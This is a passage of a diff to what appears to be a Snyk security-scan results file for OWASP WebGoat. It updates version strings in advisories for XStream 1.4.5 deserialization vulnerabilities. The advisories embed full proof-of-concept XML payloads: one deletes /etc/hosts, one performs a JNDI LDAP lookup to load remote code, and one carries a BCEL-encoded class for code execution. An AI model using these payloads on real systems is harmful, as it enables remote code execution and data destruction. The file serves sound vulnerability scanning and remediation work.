    <initialized>true</initialized>\r\n                  <pdcache/>\r\n                </processorCL>\r\n              </iterator>\r\n              <type>KEYS</type>\r\n            </e>\r\n            <in class='java.io.ByteArrayInputStream'>\r\n              <buf></buf>\r\n              <pos>-2147483648</pos>\r\n              <mark>0</mark>\r\n              <count>0</count>\r\n            </in>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21347.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "CWE-94",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "CWE-94", "maven"],
                 "cvssv3_baseScore": 6.1,
                 "security-severity": "6.1"
               }
@@ -420,14 +184,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\r\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\r\n          <packet>\r\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\r\n              <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>\r\n                <part>\r\n                  <dataHead>\r\n                    <tail/>\r\n                    <head>\r\n                      <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>\r\n                        <len>3</len>\r\n                        <data>AQID</data>\r\n                      </data>\r\n                    </head>\r\n                  </dataHead>\r\n                  <contentTransferEncoding>base64</contentTransferEncoding>\r\n                  <msg>\r\n                    <it class='java.util.ArrayList$Itr'>\r\n                      <cursor>0</cursor>\r\n                      <lastRet>1</lastRet>\r\n                      <expectedModCount>4</expectedModCount>\r\n                        <outer-class>\r\n                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\r\n                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\r\n                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\r\n                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\r\n                        </outer-class>\r\n                    </it>\r\n                    <in class='java.io.FileInputStream'>\r\n                      <fd/>\r\n                      <channel class='sun.nio.ch.FileChannelImpl'>\r\n                        <closeLock/>\r\n                        <open>true</open>\r\n                        <threads>\r\n                          <used>-1</used>\r\n                        </threads>\r\n                        <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>\r\n                          <sockClient>\r\n                            <fileName>/etc/hosts</fileName>\r\n                            <unlinkFile>true</unlinkFile>\r\n                          </sockClient>\r\n                          <connectionSync/>\r\n                        </parent>\r\n                      </channel>\r\n                      <closeLock/>\r\n                    </in>\r\n                  </msg>\r\n                </part>\r\n              </dataSource>\r\n            </message>\r\n            <satellites/>\r\n            <invocationProperties/>\r\n          </packet>\r\n        </indexMap>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\r\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\r\n          <packet>\r\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\r\n              <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>\r\n                <part>\r\n                  <dataHead>\r\n                    <tail/>\r\n                    <head>\r\n                      <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>\r\n                        <len>3</len>\r\n                        <data>AQID</data>\r\n                      </data>\r\n                    </head>\r\n                  </dataHead>\r\n                  <contentTransferEncoding>base64</contentTransferEncoding>\r\n                  <msg>\r\n                    <it class='java.util.ArrayList$Itr'>\r\n                      <cursor>0</cursor>\r\n                      <lastRet>1</lastRet>\r\n                      <expectedModCount>4</expectedModCount>\r\n                        <outer-class>\r\n                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\r\n                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\r\n                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\r\n                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\r\n                        </outer-class>\r\n                    </it>\r\n                    <in class='java.io.FileInputStream'>\r\n                      <fd/>\r\n                      <channel class='sun.nio.ch.FileChannelImpl'>\r\n                        <closeLock/>\r\n                        <open>true</open>\r\n                        <threads>\r\n                          <used>-1</used>\r\n                        </threads>\r\n                        <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>\r\n                          <sockClient>\r\n                            <fileName>/etc/hosts</fileName>\r\n                            <unlinkFile>true</unlinkFile>\r\n                          </sockClient>\r\n                          <connectionSync/>\r\n                        </parent>\r\n                      </channel>\r\n                      <closeLock/>\r\n                    </in>\r\n                  </msg>\r\n                </part>\r\n              </dataSource>\r\n            </message>\r\n            <satellites/>\r\n            <invocationProperties/>\r\n          </packet>\r\n        </indexMap>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21343.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 5.3,
                 "security-severity": "5.3"
               }
@@ -442,14 +202,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\r\n      <unserializable-parents/>\r\n      <hashtable>\r\n        <default>\r\n          <loadFactor>0.75</loadFactor>\r\n          <threshold>525</threshold>\r\n        </default>\r\n        <int>700</int>\r\n        <int>0</int>\r\n      </hashtable>\r\n      <javax.swing.UIDefaults>\r\n        <default>\r\n          <defaultLocale>zh_CN</defaultLocale>\r\n          <resourceCache/>\r\n        </default>\r\n      </javax.swing.UIDefaults>\r\n      <javax.swing.MultiUIDefaults>\r\n        <default>\r\n          <tables>\r\n            <javax.swing.UIDefaults serialization='custom'>\r\n              <unserializable-parents/>\r\n              <hashtable>\r\n                <default>\r\n                  <loadFactor>0.75</loadFactor>\r\n                  <threshold>525</threshold>\r\n                </default>\r\n                <int>700</int>\r\n                <int>1</int>\r\n                <sun.swing.SwingLazyValue>\r\n                  <className>javax.naming.InitialContext</className>\r\n                  <methodName>doLookup</methodName>\r\n                  <args>\r\n                    <arg>ldap://localhost:1099/CallRemoteMethod</arg>\r\n                  </args>\r\n                </sun.swing.SwingLazyValue>\r\n              </hashtable>\r\n              <javax.swing.UIDefaults>\r\n                <default>\r\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\r\n                  <resourceCache/>\r\n                </default>\r\n              </javax.swing.UIDefaults>\r\n            </javax.swing.UIDefaults>\r\n          </tables>\r\n        </default>\r\n      </javax.swing.MultiUIDefaults>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or highe"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\r\n      <unserializable-parents/>\r\n      <hashtable>\r\n        <default>\r\n          <loadFactor>0.75</loadFactor>\r\n          <threshold>525</threshold>\r\n        </default>\r\n        <int>700</int>\r\n        <int>0</int>\r\n      </hashtable>\r\n      <javax.swing.UIDefaults>\r\n        <default>\r\n          <defaultLocale>zh_CN</defaultLocale>\r\n          <resourceCache/>\r\n        </default>\r\n      </javax.swing.UIDefaults>\r\n      <javax.swing.MultiUIDefaults>\r\n        <default>\r\n          <tables>\r\n            <javax.swing.UIDefaults serialization='custom'>\r\n              <unserializable-parents/>\r\n              <hashtable>\r\n                <default>\r\n                  <loadFactor>0.75</loadFactor>\r\n                  <threshold>525</threshold>\r\n                </default>\r\n                <int>700</int>\r\n                <int>1</int>\r\n                <sun.swing.SwingLazyValue>\r\n                  <className>javax.naming.InitialContext</className>\r\n                  <methodName>doLookup</methodName>\r\n                  <args>\r\n                    <arg>ldap://localhost:1099/CallRemoteMethod</arg>\r\n                  </args>\r\n                </sun.swing.SwingLazyValue>\r\n              </hashtable>\r\n              <javax.swing.UIDefaults>\r\n                <default>\r\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\r\n                  <resourceCache/>\r\n                </default>\r\n              </javax.swing.UIDefaults>\r\n            </javax.swing.UIDefaults>\r\n          </tables>\r\n        </default>\r\n      </javax.swing.MultiUIDefaults>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21346.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 6.1,
                 "security-severity": "6.1"
               }
@@ -464,14 +220,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <contentType>text/plain</contentType>\r\n          <is class='java.io.SequenceInputStream'>\r\n            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>\r\n                <names class='java.util.AbstractList$Itr'>\r\n                  <cursor>0</cursor>\r\n                  <lastRet>-1</lastRet>\r\n                  <expectedModCount>0</expectedModCount>\r\n                  <outer-class class='java.util.Arrays$ArrayList'>\r\n                    <a class='string-array'>\r\n                      <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A</string>\r\n                    </a>\r\n                  </outer-class>\r\n                </names>\r\n                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>\r\n                  <parent class='sun.misc.Launcher$ExtClassLoader'>\r\n                  </parent>\r\n                  <package2certs class='hashtable'/>\r\n                  <classes defined-in='java.lang.ClassLoader'/>\r\n                  <defaultDomain>\r\n                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>\r\n                    <principals/>\r\n                    <hasAllPerm>false</hasAllPerm>\r\n                    <staticPermissions>false</staticPermissions>\r\n                    <key>\r\n                      <outer-class reference='../..'/>\r\n                    </key>\r\n                  </defaultDomain>\r\n                  <packages/>\r\n                  <nativeLibraries/>\r\n                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>\r\n                  <defaultAssertionStatus>false</defaultAssertionStatus>\r\n                  <classes/>\r\n                  <ignored__packages>\r\n                    <string>java.</string>\r\n                    <string>javax.</string>\r\n                    <string>sun.</string>\r\n                  </ignored__packages>\r\n                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>\r\n                    <__path>\r\n                      <paths/>\r\n                      <class__path>.</class__path>\r\n                    </__path>\r\n                    <__loadedClasses/>\r\n                  </repository>\r\n                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>\r\n                </processorCL>\r\n              </iterator>\r\n              <type>KEYS</type>\r\n            </e>\r\n            <in class='java.io.ByteArrayInputStream'>\r\n              <buf></buf>\r\n              <pos>0</pos>\r\n              <mark>0</mark>\r\n              <count>0</count>\r\n            </in>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called des"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <contentType>text/plain</contentType>\r\n          <is class='java.io.SequenceInputStream'>\r\n            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>\r\n                <names class='java.util.AbstractList$Itr'>\r\n                  <cursor>0</cursor>\r\n                  <lastRet>-1</lastRet>\r\n                  <expectedModCount>0</expectedModCount>\r\n                  <outer-class class='java.util.Arrays$ArrayList'>\r\n                    <a class='string-array'>\r\n                      